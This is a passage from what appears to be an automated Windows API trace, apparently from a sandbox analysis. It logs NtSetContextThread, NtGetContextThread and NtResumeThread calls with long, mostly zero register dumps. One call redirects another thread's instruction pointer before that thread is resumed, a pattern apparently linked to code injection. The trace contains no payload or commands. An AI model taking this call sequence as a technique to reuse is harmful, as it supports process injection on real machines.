[334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0108.274] NtSetContextThread (ThreadHandle=0x120, Context=0x3874100*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x113b7de, Ebp=0x0, Eip=0x70000, SegCs=0x23, EFlags=0x202, Esp=0x2dfd88, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0108.286] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0108.292] NtResumeThread (in: ThreadHandle=0x120, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0108.335] NtGetContextThread (in: ThreadHandle=0xfffffffe, Context=0x3875004 | out: Context=0x3875004*(ContextFlags=0x10010, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x0, Edx=0x0, Ecx=0x0, Eax=0x0, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, 